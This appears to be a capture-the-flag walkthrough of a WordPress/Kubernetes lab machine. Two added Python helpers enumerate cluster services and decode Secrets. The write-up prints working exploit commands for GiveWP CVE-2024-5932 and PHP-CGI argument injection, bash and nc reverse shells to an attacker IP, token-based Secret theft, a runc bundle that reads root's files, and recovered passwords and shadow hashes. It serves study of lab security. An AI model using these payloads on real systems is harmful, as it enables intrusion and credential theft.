Basic information

Port scan

Only ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.94
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 12:45 JST
Nmap scan report for 10.10.11.94
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_ 256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open http nginx 1.28.0
|_http-generator: WordPress 6.8.1
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
|_http-server-header: nginx/1.28.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

80

Port 80 serves a donation site built on WordPress (6.8.1 according to the generator tag):

GiveWP

A routine wpscan run shows the site uses the GiveWP plugin, which has a long list of known vulnerabilities (wpscan only prints the vulnerability data when given a WPScan API token):

wpscan --url http://10.10.11.94/ --enumerate p,t,u --plugins-detection aggressive

CVE-2024-5932

Searching for the CVE turns up public analysis and exploit code. CVE-2024-5932 is an unauthenticated PHP object injection in GiveWP (versions up to and including 3.14.1) through the give_title parameter of the donation form, which leads to remote code execution.

The exploit needs the URL of a donation form, which can be found on the site's donations page; running it returns a shell as root inside the WordPress container:

http://10.10.11.94/donations/the-things-we-need/

python3 CVE-2024-5932-rce.py -u http://10.10.11.94/donations/the-things-we-need/ -c "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"

LEGACY_INTRANET_SERVICE

The environment variables include LEGACY_INTRANET_SERVICE_PORT, a Kubernetes service-discovery variable pointing at port 5000 on another pod:

env

LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
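Kubernetes injects variables of this shape (NAME_PORT=tcp://ip:port, NAME_PORT_<port>_<proto>, and NAME_SERVICE_HOST / NAME_SERVICE_PORT) for every Service that existed in the pod's namespace when the pod started, so the environment alone is a service inventory when the container has no curl or nmap. The following is an added example, not part of the write-up: it parses those variables into a deduplicated target list. The sample environment is constructed; the only real value in it is the LEGACY_INTRANET_SERVICE address from the write-up, and the API-server address 10.43.0.1 is an invented placeholder.

```python
"""Enumerate in-cluster services from Kubernetes-injected environment variables.

Added example, not part of the original write-up. Kubernetes adds, for every
Service visible to a pod at start time, variables such as
NAME_PORT=tcp://ip:port, NAME_PORT_<port>_<proto>=tcp://ip:port and
NAME_SERVICE_HOST / NAME_SERVICE_PORT. Parsing them yields targets to probe.
"""
import os
import re
from typing import Dict, List, Mapping, Set, Tuple

# Constructed sample environment. LEGACY_INTRANET_SERVICE values come from the
# write-up; the KUBERNETES_* address is an invented placeholder.
SAMPLE_ENV = {
    "PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "LEGACY_INTRANET_SERVICE_PORT": "tcp://10.43.2.241:5000",
    "LEGACY_INTRANET_SERVICE_PORT_5000_TCP": "tcp://10.43.2.241:5000",
    "LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR": "10.43.2.241",
    "LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT": "5000",
    "LEGACY_INTRANET_SERVICE_SERVICE_HOST": "10.43.2.241",
    "LEGACY_INTRANET_SERVICE_SERVICE_PORT": "5000",
    "KUBERNETES_SERVICE_HOST": "10.43.0.1",
    "KUBERNETES_SERVICE_PORT": "443",
    "KUBERNETES_PORT": "tcp://10.43.0.1:443",
}

Service = Tuple[str, str, int]  # (protocol, host, port)

# NAME_PORT or NAME_PORT_<port>_<proto>; the *_ADDR / *_PORT / *_PROTO leaves are
# either rejected by this pattern or by the URL pattern on their value.
_LINK_RE = re.compile(r"^(?P<svc>[A-Z0-9_]+?)_PORT(?:_(?P<p>\d+)_(?P<proto>TCP|UDP|SCTP))?$")
_URL_RE = re.compile(r"^(?P<proto>tcp|udp|sctp)://(?P<host>[^:]+):(?P<port>\d+)$")


def _svc_name(env_prefix: str) -> str:
    """Reverse Kubernetes' name mangling: LEGACY_INTRANET_SERVICE -> legacy-intranet-service."""
    return env_prefix.lower().replace("_", "-")


def discover_services(env: Mapping[str, str]) -> Dict[str, List[Service]]:
    """Map service name -> sorted list of (proto, host, port) endpoints."""
    found: Dict[str, Set[Service]] = {}

    # Docker-link style variables carrying a full URL.
    for key, value in env.items():
        m = _LINK_RE.match(key)
        u = _URL_RE.match(value)
        if not (m and u):
            continue
        svc = _svc_name(m.group("svc"))
        found.setdefault(svc, set()).add((u.group("proto"), u.group("host"), int(u.group("port"))))

    # Plain HOST/PORT pairs; these say nothing about the protocol, so TCP is assumed.
    for key, host in env.items():
        if not key.endswith("_SERVICE_HOST"):
            continue
        prefix = key[: -len("_SERVICE_HOST")]
        port = env.get(prefix + "_SERVICE_PORT")
        if port and port.isdigit():
            found.setdefault(_svc_name(prefix), set()).add(("tcp", host, int(port)))

    return {name: sorted(eps) for name, eps in sorted(found.items())}


def probe_targets(services: Dict[str, List[Service]], skip_api: bool = True) -> List[str]:
    """Flatten to host:port/proto strings, optionally skipping the API server itself."""
    out: List[str] = []
    for name, eps in services.items():
        if skip_api and name == "kubernetes":
            continue
        out.extend(f"{host}:{port}/{proto}" for proto, host, port in eps)
    return out


if __name__ == "__main__":
    # Run inside the compromised pod: lists what this pod can reach by name.
    for name, eps in discover_services(os.environ).items():
        for proto, host, port in eps:
            print(f"{name:30s} {proto}://{host}:{port}")
```

One caveat for the target list: these variables are a snapshot from pod start, so Services created later are only visible through DNS (name.namespace.svc), not in the environment.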

The container does not even have curl, but Perl (HTTP::Tiny) or PHP can be used to issue requests. The service's index page lists a PHP-CGI handler:

alias pcurl='perl -MHTTP::Tiny -e '\''$_=shift;$_="http://$_" unless /^https?:\/\//;print HTTP::Tiny->new->get($_)->{content}'\'''

pcurl http://10.43.2.241:5000

<li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>

PHP-CGI

The rest is command execution through PHP-CGI: the query string smuggles -d directives to php-cgi that set allow_url_include=1 and auto_prepend_file=php://input, so whatever is sent in the POST body is loaded as the auto-prepended script. This gives root inside the second container:

php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="id"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);' 

php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="nc 10.10.14.2 4444 -e sh"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);'

kubernetes

The next part needs a little Kubernetes knowledge. The second container has a service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is allowed to list Secrets in the default namespace. One of them, user-secret-babywyrm, holds the user's password under the key MASTERPASS:

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets

user-secret-babywyrm
"data": {
"MASTERPASS": "c1NWZXZwNzRUaHlZRFJaSnY4VUQyR3JzU0FUSHNyVg=="
},

echo c1NWZXZwNzRUaHlZRFJaSnY4VUQyR3JzU0FUSHNyVg== | base64 -d
sSVevp74ThyYDRZJv8UD2GrsSATHsrV

user flag

The password recovered above is babywyrm's; log in with it over SSH to collect the user flag.

Privilege escalation enumeration

sudo allows running the debug tool, but it prompts for another administrative password.

That password is a reuse of one already stored in the cluster's Secrets, the mariadb-password value:

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets | grep -irn pass

62: "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",

c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
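Both Secret look-ups above (the MASTERPASS extraction and the grep for "pass") are the same job: pull the SecretList from the API server and base64-decode every data field. The following is an added example, not part of the write-up: it does that in one pass and flags credential-looking keys. The embedded SecretList is a constructed, trimmed response built from the two base64 values that appear in the write-up; the secret name "mariadb" and the empty mariadb-root-password entry are invented placeholders, since the grep output only shows the key name. The live-query helper uses the mounted CA bundle instead of curl -k.

```python
"""Decode every data field in a Kubernetes SecretList and flag credential-like keys.

Added example, not part of the original write-up. Replaces the
curl | grep | base64 -d loop with one pass over the API response.
"""
import base64
import json
import re
import ssl
import urllib.request
from typing import Dict, List

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
API = "https://kubernetes.default.svc"

# Constructed, trimmed SecretList. The two base64 values are from the write-up;
# the "mariadb" secret name and the empty mariadb-root-password are invented
# placeholders (the write-up only shows the mariadb-password key).
SAMPLE_SECRET_LIST = json.dumps({
    "kind": "SecretList",
    "apiVersion": "v1",
    "items": [
        {
            "metadata": {"name": "user-secret-babywyrm", "namespace": "default"},
            "type": "Opaque",
            "data": {"MASTERPASS": "c1NWZXZwNzRUaHlZRFJaSnY4VUQyR3JzU0FUSHNyVg=="},
        },
        {
            "metadata": {"name": "mariadb", "namespace": "default"},
            "type": "Opaque",
            "data": {
                "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
                "mariadb-root-password": "",  # constructed: empty value must not crash the decoder
            },
        },
    ],
})

# The write-up's grep only matched "pass"; this net is a little wider.
CRED_KEY_RE = re.compile(r"pass|pwd|secret|token|key|cred", re.I)


def decode_secret_list(secret_list_json: str) -> Dict[str, Dict[str, str]]:
    """Map secret name -> {key: decoded value}; non-UTF-8 payloads are shown as hex:..."""
    doc = json.loads(secret_list_json)
    out: Dict[str, Dict[str, str]] = {}
    for item in doc.get("items", []):
        name = item["metadata"]["name"]
        decoded: Dict[str, str] = {}
        for key, b64 in (item.get("data") or {}).items():
            raw = base64.b64decode(b64 or "")
            try:
                decoded[key] = raw.decode("utf-8")
            except UnicodeDecodeError:
                decoded[key] = "hex:" + raw.hex()
        out[name] = decoded
    return out


def credential_candidates(secrets: Dict[str, Dict[str, str]]) -> List[str]:
    """Return 'secret/key=value' lines for non-empty values under credential-like keys."""
    return [
        f"{name}/{key}={value}"
        for name, kv in secrets.items()
        for key, value in kv.items()
        if CRED_KEY_RE.search(key) and value
    ]


def fetch_secret_list(namespace: str = "default") -> str:
    """Query the API server with the pod's own service-account token.

    Uses the mounted ca.crt rather than disabling verification (curl -k), so the
    connection is authenticated in both directions. Network access is required.
    """
    with open(f"{SA_DIR}/token") as fh:
        token = fh.read().strip()
    ctx = ssl.create_default_context(cafile=f"{SA_DIR}/ca.crt")
    req = urllib.request.Request(
        f"{API}/api/v1/namespaces/{namespace}/secrets",
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Offline run over the constructed sample; swap in fetch_secret_list() inside the pod.
    for line in credential_candidates(decode_secret_list(SAMPLE_SECRET_LIST)):
        print(line)
```

Note that a service account allowed to list Secrets in its namespace sees every Secret there, including other service-account tokens, which is why the RBAC binding granting that verb is the real finding here.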

The tool turns out to be runc-based (a debug wrapper around runc):

Under those conditions, bind-mounting the host's files into a container and reading them is enough: the wrapper runs runc as root and accepts an arbitrary bundle.

Privilege escalation & root flag

Create your own OCI bundle (a rootfs directory plus a config.json that bind-mounts the host's /root read-only), run it through the debug wrapper, and read the flag:

mkdir -p ~/miao
cd ~/miao
# runc expects a bundle: a rootfs directory plus a config.json next to it
mkdir rootfs

# Minimal OCI config: run as uid 0, bind-mount the host's /root (read-only)
# and the binaries/libraries cat needs, then cat the flag
cat > config.json << 'EOF'
{
  "ociVersion": "1.0.2",
  "process": {
    "user": {"uid": 0, "gid": 0},
    "args": ["/bin/cat", "/root/root.txt"],
    "cwd": "/",
    "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
    "terminal": false
  },
  "root": {"path": "rootfs"},
  "mounts": [
    {"destination": "/proc", "type": "proc", "source": "proc"},
    {"destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": ["nosuid","strictatime","mode=755","size=65536k"]},
    {"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
    {"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
    {"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
    {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
    {"destination": "/usr", "type": "bind", "source": "/usr", "options": ["bind","ro"]}
  ],
  "linux": {
    "namespaces": [
      {"type": "pid"},
      {"type": "network"},
      {"type": "ipc"},
      {"type": "uts"},
      {"type": "mount"}
    ]
  }
}
EOF

# Run the bundle in the current directory under the container id "miao"
sudo /opt/debug run miao

shadow

root:$y$j9T$QFzc3gsorLqusBf73kX1x.$jyvD/pCPnr99xNLW62eqJVCQT5IbN7seZdPI3YoLgCA:20361:0:99999:7:::
babywyrm:$y$j9T$w4JcmxWlt7CcIm56259hg.$6mOkZ1aYlh9uyN3vZp9gRKqlGEzmgGYQRZFP5U/n1X7:20396:0:99999:7:::
